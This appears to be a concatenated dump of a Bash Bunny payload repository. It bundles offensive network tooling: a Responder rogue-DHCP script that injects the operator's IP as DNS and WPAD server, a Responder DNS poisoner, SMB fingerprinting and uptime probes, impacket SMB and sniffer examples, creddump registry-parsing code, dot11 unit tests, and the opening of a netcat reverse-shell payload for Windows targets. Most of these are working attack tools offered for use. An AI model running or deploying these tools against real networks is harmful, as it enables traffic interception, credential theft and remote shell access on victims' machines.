23 | 24 | Author: Catalin Patulea 25 | """ 26 | import sys 27 | 28 | from impacket.examples import logger 29 | from impacket import uuid 30 | from impacket.dcerpc.v5 import transport 31 | 32 | 33 | def main(args): 34 | if len(args) != 4: 35 | print "usage: opdump.py hostname port interface version" 36 | return 1 37 | 38 | host, port, interface, version = args[0], int(args[1]), args[2], args[3] 39 | 40 | stringbinding = "ncacn_ip_tcp:%s" % host 41 | trans = transport.DCERPCTransportFactory(stringbinding) 42 | trans.set_dport(port) 43 | 44 | results = [] 45 | for i in range(256): 46 | dce = trans.get_dce_rpc() 47 | dce.connect() 48 | 49 | iid = uuid.uuidtup_to_bin((interface, version)) 50 | dce.bind(iid) 51 | 52 | dce.call(i, "") 53 | try: 54 | dce.recv() 55 | except Exception, e: 56 | result = str(e) 57 | else: 58 | result = "success" 59 | 60 | dce.disconnect() 61 | 62 | results.append(result) 63 | 64 | # trim duplicate suffixes from the back 65 | suffix = results[-1] 66 | while results and results[-1] == suffix: 67 | results.pop() 68 | 69 | for i, result in enumerate(results): 70 | print "op %d (0x%02x): %s" % (i, i, result) 71 | 72 | print "ops %d-%d: %s" % (len(results), 255, suffix) 73 | 74 | if __name__ == "__main__": 75 | # Init the example's logger theme 76 | logger.init() 77 | sys.exit(main(sys.argv[1:])) 78 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/DHCP_Auto.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This file is part of Responder. laurent.gaffie@gmail.com 3 | # 4 | # 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 
9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | 18 | # This script will try to auto-detect network parameters 19 | # to run the rogue DHCP server, to inject only your IP 20 | # address as the primary DNS server and WPAD server and 21 | # leave everything else normal. 22 | 23 | if [ -z $1 ]; then 24 | echo "usage: $0 " 25 | exit 26 | fi 27 | 28 | if [ $EUID -ne 0 ]; then 29 | echo "Must be run as root." 30 | exit 31 | fi 32 | 33 | if [ ! -d "/sys/class/net/$1" ]; then 34 | echo "Interface does not exist." 35 | exit 36 | fi 37 | 38 | INTF=$1 39 | PATH="$PATH:/sbin" 40 | IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'` 41 | NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'` 42 | DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'` 43 | DNS1=$IPADDR 44 | DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'` 45 | ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'` 46 | WPADSTR="http://$IPADDR/wpad.dat" 47 | if [ -z "$DOMAIN" ]; then 48 | DOMAIN=" " 49 | fi 50 | 51 | echo "Running with parameters:" 52 | echo "INTERFACE: $INTF" 53 | echo "IP ADDR: $IPADDR" 54 | echo "NETMAST: $NETMASK" 55 | echo "ROUTER IP: $ROUTER" 56 | echo "DNS1 IP: $DNS1" 57 | echo "DNS2 IP: $DNS2" 58 | echo "WPAD: $WPADSTR" 59 | echo "" 60 | 61 | 62 | echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 63 | python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 64 | -------------------------------------------------------------------------------- 
/payloads/library/tools_installer/tools_to_install/impacket/examples/loopchain.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import time 4 | 5 | from impacket.examples import logger 6 | from impacket import smb 7 | 8 | 9 | class lotsSMB(smb.SMB): 10 | def loop_write_andx(self,tid,fid,data, offset = 0, wait_answer=1): 11 | pkt = smb.NewSMBPacket() 12 | pkt['Flags1'] = 0x18 13 | pkt['Flags2'] = 0 14 | pkt['Tid'] = tid 15 | 16 | writeAndX = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 17 | pkt.addCommand(writeAndX) 18 | 19 | writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters() 20 | writeAndX['Parameters']['Fid'] = fid 21 | writeAndX['Parameters']['Offset'] = offset 22 | writeAndX['Parameters']['WriteMode'] = 0 23 | writeAndX['Parameters']['Remaining'] = len(data) 24 | writeAndX['Parameters']['DataLength'] = len(data) 25 | writeAndX['Parameters']['DataOffset'] = len(pkt) 26 | writeAndX['Data'] = data+('A'*4000) 27 | 28 | saved_offset = len(pkt) 29 | 30 | writeAndX2 = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 31 | pkt.addCommand(writeAndX2) 32 | 33 | writeAndX2['Parameters'] = smb.SMBWriteAndX_Parameters() 34 | writeAndX2['Parameters']['Fid'] = fid 35 | writeAndX2['Parameters']['Offset'] = offset 36 | writeAndX2['Parameters']['WriteMode'] = 0 37 | writeAndX2['Parameters']['Remaining'] = len(data) 38 | writeAndX2['Parameters']['DataLength'] = len(data) 39 | writeAndX2['Parameters']['DataOffset'] = len(pkt) 40 | writeAndX2['Data'] = '\n' 41 | 42 | writeAndX2['Parameters']['AndXCommand'] = self.SMB_COM_WRITE_ANDX 43 | writeAndX2['Parameters']['AndXOffset'] = saved_offset 44 | 45 | self.sendSMB(pkt) 46 | 47 | if wait_answer: 48 | pkt = self.recvSMB() 49 | if pkt.isValidAnswer(self.SMB_COM_WRITE_ANDX): 50 | return pkt 51 | return None 52 | 53 | # Init the example's logger theme 54 | logger.init() 55 | s = lotsSMB('*SMBSERVER','192.168.1.1') 56 | s.login('Administrator','pasword') 57 | tid = 
s.tree_connect(r'\\*SMBSERVER\IPC$') 58 | fid = s.open_andx(tid, r'\pipe\echo', smb.SMB_O_CREAT, smb.SMB_O_OPEN)[0] 59 | 60 | s.loop_write_andx(tid,fid,'<1234>\n', wait_answer = 0) 61 | 62 | time.sleep(2) 63 | s.close(tid,fid) 64 | 65 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple packet sniffer. 9 | # 10 | # This packet sniffer uses a raw socket to listen for packets 11 | # in transit corresponding to the specified protocols. 12 | # 13 | # Note that the user might need special permissions to be able to use 14 | # raw sockets. 15 | # 16 | # Authors: 17 | # Gerardo Richarte 18 | # Javier Kohen 19 | # 20 | # Reference for: 21 | # ImpactDecoder. 22 | 23 | from select import select 24 | import socket 25 | import sys 26 | 27 | from impacket import ImpactDecoder 28 | 29 | DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp') 30 | 31 | if len(sys.argv) == 1: 32 | toListen = DEFAULT_PROTOCOLS 33 | print "Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ..." % sys.argv[0] 34 | else: 35 | toListen = sys.argv[1:] 36 | 37 | # Open one socket for each specified protocol. 38 | # A special option is set on the socket so that IP headers are included with 39 | # the returned data. 
40 | sockets = [] 41 | for protocol in toListen: 42 | try: 43 | protocol_num = socket.getprotobyname(protocol) 44 | except socket.error: 45 | print "Ignoring unknown protocol:", protocol 46 | toListen.remove(protocol) 47 | continue 48 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num) 49 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 50 | sockets.append(s) 51 | 52 | if 0 == len(toListen): 53 | print "There are no protocols available." 54 | sys.exit(0) 55 | 56 | print "Listening on protocols:", toListen 57 | 58 | # Instantiate an IP packets decoder. 59 | # As all the packets include their IP header, that decoder only is enough. 60 | decoder = ImpactDecoder.IPDecoder() 61 | 62 | while len(sockets) > 0: 63 | # Wait for an incoming packet on any socket. 64 | ready = select(sockets, [], [])[0] 65 | for s in ready: 66 | packet = s.recvfrom(4096)[0] 67 | if 0 == len(packet): 68 | # Socket remotely closed. Discard it. 69 | sockets.remove(s) 70 | s.close() 71 | else: 72 | # Packet received. Decode and display it. 73 | packet = decoder.decode(packet) 74 | print packet 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/fingerprint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import socket 18 | import struct 19 | 20 | from utils import color 21 | from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData 22 | 23 | def OsNameClientVersion(data): 24 | try: 25 | length = struct.unpack('i", len(''.join(Packet)))+Packet 44 | s.send(Buffer) 45 | data = s.recv(2048) 46 | 47 | if data[8:10] == "\x72\x00": 48 | Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") 49 | Body = SMBSessionFingerData() 50 | Body.calculate() 51 | 52 | Packet = str(Header)+str(Body) 53 | Buffer = struct.pack(">i", len(''.join(Packet)))+Packet 54 | 55 | s.send(Buffer) 56 | data = s.recv(2048) 57 | 58 | if data[8:10] == "\x73\x16": 59 | return OsNameClientVersion(data) 60 | except: 61 | print color("[!] ", 1, 1) +" Fingerprint failed" 62 | return None 63 | -------------------------------------------------------------------------------- /payloads/library/DuckyInstall/install.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # Based on bashbunnypayloads installer 3 | # https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/tools_installer/install.sh 4 | 5 | # Check Switch Position 6 | source bunny_helpers.sh 7 | 8 | TARGET_DIR='/root/tools' 9 | RELEASE_ARCHIVE=$(find /root/udisk/payloads/${SWITCH_POSITION} -name DuckToolkit-*) 10 | 11 | echo "Install Log:" > /tmp/duck_installer.log 12 | echo "----------------" >> /tmp/duck_installer.log 13 | 14 | if [ -f ${RELEASE_ARCHIVE} ]; then 15 | echo "Found ${RELEASE_ARCHIVE}" >> /tmp/duck_installer.log 16 | else 17 | LED R 18 | echo "No ducktoolkit release found" >> /tmp/duck_installer.log 19 | exit 1 20 | fi 21 | 22 | # Set LED to purple blinking and move files 23 | LED R B 100 24 | 25 | # Backup Existing library 26 | if 
[ -d "$TARGET_DIR/DuckToolkit" ]; then 27 | echo "Library Exists; removing" >> /tmp/duck_installer.log 28 | rm -rf ${TARGET_DIR}/DuckToolkit 29 | fi 30 | 31 | echo "Copying files to target dir" >> /tmp/duck_installer.log 32 | cp ${RELEASE_ARCHIVE} ${TARGET_DIR} 33 | cd ${TARGET_DIR} 34 | tar zxf DuckToolkit-* && mv $(find . -name "DuckToolkit-*" ! -name "*.gz") DuckToolkit && rm DuckToolkit*.tar.gz 35 | 36 | echo "Move Complete" >> /tmp/duck_installer.log 37 | 38 | # Set LED to purple solid and check that move completed 39 | LED R B 40 | if ! [ -d "${TARGET_DIR}/DuckToolkit" ]; then 41 | # Set LED to red on fail and exit 42 | LED R 43 | echo "Failed to copy files to target dir" >> /tmp/duck_installer.log 44 | exit 1 45 | else 46 | # Set LED to amber blinking on setup 47 | LED G R 100 48 | # Set calling script executable 49 | chmod +x ${TARGET_DIR}/DuckToolkit/bunnyducky.py 50 | 51 | # Update Q and QUACK to use the new library 52 | echo "Update Q" >> /tmp/duck_installer.log 53 | cat <<'EOF' > /root/Q 54 | #!/bin/sh 55 | # Input parameters; 56 | strparam="$@" 57 | /root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt 58 | exit 0 59 | EOF 60 | 61 | echo "Update QUACK" >> /tmp/duck_installer.log 62 | cat <<'EOF' > /root/QUACK 63 | #!/bin/sh 64 | # Input parameters; 65 | strparam="$@" 66 | /root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt 67 | exit 0 68 | EOF 69 | 70 | # LED To green for complete 71 | LED R G B 72 | 73 | fi 74 | cp /tmp/duck_installer.log /root/udisk/payloads/${SWITCH_POSITION}/install_log.txt 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlRTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | 
sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameRTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlRTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame RTS 15 | self.frame_orig='\xb4\x00\x81\x01\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x99\x75\x43\x73' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND) 27 | 28 | self.rts = Dot11ControlFrameRTS(d.get_body_as_string()) 29 | 30 | d.contains(self.rts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.rts.get_header_size(), 14) 35 | self.assertEqual(self.rts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.rts.get_duration(), 0x181) 41 | self.rts.set_duration(0x1234) 42 | self.assertEqual(self.rts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.rts.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.rts.set_ra(ra) 52 | self.assertEqual(self.rts.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.rts.get_ta() 58 | self.assertEqual(ta.tolist(), [0x00,0x23,0x4d,0x09,0x86,0xfe]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.rts.set_ta(ta) 62 | self.assertEqual(self.rts.get_ta().tolist(), [0x12,0x23,0x4d,0x09,0x86,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlRTS) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | 
-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEnd.py: --------------------------------------------------------------------------------
#!/usr/bin/env python

# Python 2.5-era test module: the parent package is put on sys.path by hand
# so the file can be executed directly from the testcases directory.
import sys
sys.path.insert(0,"../..")

from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEnd
from binascii import hexlify
import unittest

class TestDot11FrameControlCFEnd(unittest.TestCase):
    """Decode a captured 802.11 CF-End control frame and exercise the
    field accessors of Dot11ControlFrameCFEnd against its known values."""

    def setUp(self):
        # Raw CF-End control frame: FC e4 00, duration 0, broadcast RA,
        # BSSID 00:19:e0:98:04:d4; the trailing four bytes are presumably the FCS.
        self.frame_orig='\xe4\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x19\xe0\x98\x04\xd4\xad\x9c\x3c\xc0'

        frame = Dot11(self.frame_orig)

        # The generic Dot11 header must classify this as a CF-End control frame
        # before the body is interpreted as one.
        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END)

        # Parse the body as a CF-End frame and attach it as the header's child.
        self.cfend = Dot11ControlFrameCFEnd(frame.get_body_as_string())
        frame.contains(self.cfend)

    def _check_address(self, getter, setter, expected, rewritten):
        """Read a 6-byte address with ``getter``, compare it to ``expected``,
        overwrite its first and last byte with 0x12/0x34, store it with
        ``setter`` and check the re-read value equals ``rewritten``."""
        address = getter()
        self.assertEqual(address.tolist(), expected)
        address[0] = 0x12
        address[5] = 0x34
        setter(address)
        self.assertEqual(getter().tolist(), rewritten)

    def test_01_HeaderTailSize(self):
        'Test Header and Tail Size field'
        # Duration (2) + RA (6) + BSSID (6) = 14 header bytes, no tail.
        self.assertEqual(self.cfend.get_header_size(), 14)
        self.assertEqual(self.cfend.get_tail_size(), 0)

    def test_02_Duration(self):
        'Test Duration field'
        # Captured frame carries a zero duration; check it is writable.
        self.assertEqual(self.cfend.get_duration(), 0x00)
        self.cfend.set_duration(0x1234)
        self.assertEqual(self.cfend.get_duration(), 0x1234)

    def test_03_RA(self):
        'Test RA field'
        self._check_address(self.cfend.get_ra, self.cfend.set_ra,
                            [0xff]*6,
                            [0x12,0xff,0xff,0xff,0xff,0x34])

    def test_04_BSSID(self):
        'Test BSS ID field'
        self._check_address(self.cfend.get_bssid, self.cfend.set_bssid,
                            [0x00,0x19,0xe0,0x98,0x04,0xd4],
                            [0x12,0x19,0xe0,0x98,0x04,0x34])

suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEnd)
unittest.TextTestRunner(verbosity=2).run(suite)

-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSMB2UPTime.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
17 | import sys 18 | import os 19 | import datetime 20 | import struct 21 | import socket 22 | 23 | sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))) 24 | from packets import SMB2Header, SMB2Nego, SMB2NegoData 25 | 26 | def GetBootTime(data): 27 | Filetime = int(struct.unpack('i", len(Packet)) + Packet 52 | s.send(Buffer) 53 | 54 | try: 55 | data = s.recv(1024) 56 | if data[4:5] == "\xff": 57 | print "This host doesn't support SMBv2" 58 | if data[4:5] == "\xfe": 59 | IsDCVuln(GetBootTime(data[116:124])) 60 | except Exception: 61 | s.close() 62 | raise 63 | 64 | if __name__ == "__main__": 65 | if len(sys.argv)<=1: 66 | sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address') 67 | host = sys.argv[1],445 68 | run(host) 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlPSPoll.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFramePSPoll 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlPSPoll(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame PSPoll 15 | self.frame_orig='\xa6\x73\xf1\xaf\x48\x06\xee\x23\x2b\xc9\xfe\xbe\xe5\x05\x4c\x0a\x04\xa0\x00\x0f' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL) 27 | 28 | self.pspoll = Dot11ControlFramePSPoll(d.get_body_as_string()) 29 | 30 | d.contains(self.pspoll) 
31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.pspoll.get_header_size(), 14) 35 | self.assertEqual(self.pspoll.get_tail_size(), 0) 36 | 37 | def test_02_AID(self): 38 | 'Test AID field' 39 | 40 | self.assertEqual(self.pspoll.get_aid(), 0xAFF1) 41 | self.pspoll.set_aid(0x1234) 42 | self.assertEqual(self.pspoll.get_aid(), 0x1234) 43 | 44 | def test_03_BSSID(self): 45 | 'Test BSS ID field' 46 | 47 | bssid=self.pspoll.get_bssid() 48 | self.assertEqual(bssid.tolist(), [0x48,0x06,0xee,0x23,0x2b,0xc9]) 49 | bssid[0]=0x12 50 | bssid[5]=0x34 51 | self.pspoll.set_bssid(bssid) 52 | self.assertEqual(self.pspoll.get_bssid().tolist(), [0x12,0x06,0xee,0x23,0x2b,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.pspoll.get_ta() 58 | self.assertEqual(ta.tolist(), [0xfe,0xbe,0xe5,0x05,0x4c,0x0a]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.pspoll.set_ta(ta) 62 | self.assertEqual(self.pspoll.get_ta().tolist(), [0x12,0xbe,0xe5,0x05,0x4c,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlPSPoll) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/rawreg.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | from framework.newobj import Obj,Pointer 23 | from struct import unpack 24 | 25 | ROOT_INDEX = 0x20 26 | LH_SIG = unpack(". 17 | from packets import DNS_Ans 18 | from SocketServer import BaseRequestHandler 19 | from utils import * 20 | 21 | def ParseDNSType(data): 22 | QueryTypeClass = data[len(data)-4:] 23 | 24 | # If Type A, Class IN, then answer. 25 | return QueryTypeClass == "\x00\x01\x00\x01" 26 | 27 | 28 | 29 | class DNS(BaseRequestHandler): 30 | def handle(self): 31 | # Break out if we don't want to respond to this host 32 | if RespondToThisIP(self.client_address[0]) is not True: 33 | return None 34 | 35 | try: 36 | data, soc = self.request 37 | 38 | if ParseDNSType(data) and settings.Config.AnalyzeMode == False: 39 | buff = DNS_Ans() 40 | buff.calculate(data) 41 | soc.sendto(str(buff), self.client_address) 42 | 43 | ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 44 | print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 45 | 46 | except Exception: 47 | pass 48 | 49 | # DNS Server TCP Class 50 | class DNSTCP(BaseRequestHandler): 51 | def handle(self): 52 | # Break out if we don't want to respond to this host 53 | if RespondToThisIP(self.client_address[0]) is not True: 54 | return None 55 | 56 | try: 57 | data = self.request.recv(1024) 58 | 59 | if ParseDNSType(data) and settings.Config.AnalyzeMode is False: 60 | buff = DNS_Ans() 61 | buff.calculate(data) 62 | self.request.send(str(buff)) 63 | 64 | ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) 65 | print color("[*] [DNS-TCP] Poisoned answer sent to: 
%-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1) 66 | 67 | except Exception: 68 | pass 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEndCFACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEndCFACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEndCFACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEndCFACK 15 | self.frame_orig='\xf4\x74\xde\xed\xe5\x56\x85\xf8\xd2\x3b\x96\xae\x0f\xb0\xd9\x8a\x03\x02\x38\x00' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK) 27 | 28 | self.cfendcfack = Dot11ControlFrameCFEndCFACK(d.get_body_as_string()) 29 | 30 | d.contains(self.cfendcfack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfendcfack.get_header_size(), 14) 35 | self.assertEqual(self.cfendcfack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfendcfack.get_duration(), 0xEDDE) 41 | self.cfendcfack.set_duration(0x1234) 42 | self.assertEqual(self.cfendcfack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfendcfack.get_ra() 48 | self.assertEqual(ra.tolist(), [0xe5,0x56,0x85,0xf8,0xd2,0x3b]) 49 | ra[0]=0x12 50 | 
ra[5]=0x34 51 | self.cfendcfack.set_ra(ra) 52 | self.assertEqual(self.cfendcfack.get_ra().tolist(), [0x12,0x56,0x85,0xf8,0xd2,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfendcfack.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x96,0xae,0x0f,0xb0,0xd9,0x8a]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfendcfack.set_bssid(bssid) 62 | self.assertEqual(self.cfendcfack.get_bssid().tolist(), [0x12,0xae,0x0f,0xb0,0xd9,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEndCFACK) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | -------------------------------------------------------------------------------- /payloads/library/RAZ_ReverseShell/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: RAZ_ReverseShell 4 | # Author: RalphyZ 5 | # Version: 1.0 6 | # Target: Windows 7+ 7 | # Dependencies: The following files must exist in the switch folder: 8 | # nc.exe - Windows binary for netcat with the -e flag 9 | # listener_port.txt - The Port number for the netcat listener 10 | # listener_ip.txt - The IP Address for the netcat listener 11 | # 12 | # Description: Executes a netcat reverse cmd shell at a given IP and Port 13 | # Intentionally, this script leaves a trace in the Run Box 14 | # 15 | # Colors: 16 | # Green.....................Working 17 | # White.....................Completed without error 18 | # White (blinking)..........Incrementing the port in listener_port.txt 19 | # Blue (blinking)...........listener_port.txt was not found 20 | # Light-Blue (blinking).....listener_ip.txt was not found 21 | # Amber (blinking)..........nc.exe was not found 22 | 23 | 24 | # Change this if you want to enable auto_increment of the netcat port 25 | # If true, the port number is increased by 1 everytime the script runs 26 | # This is good for Red Teams doing PenTesting on multiple computers 27 | 
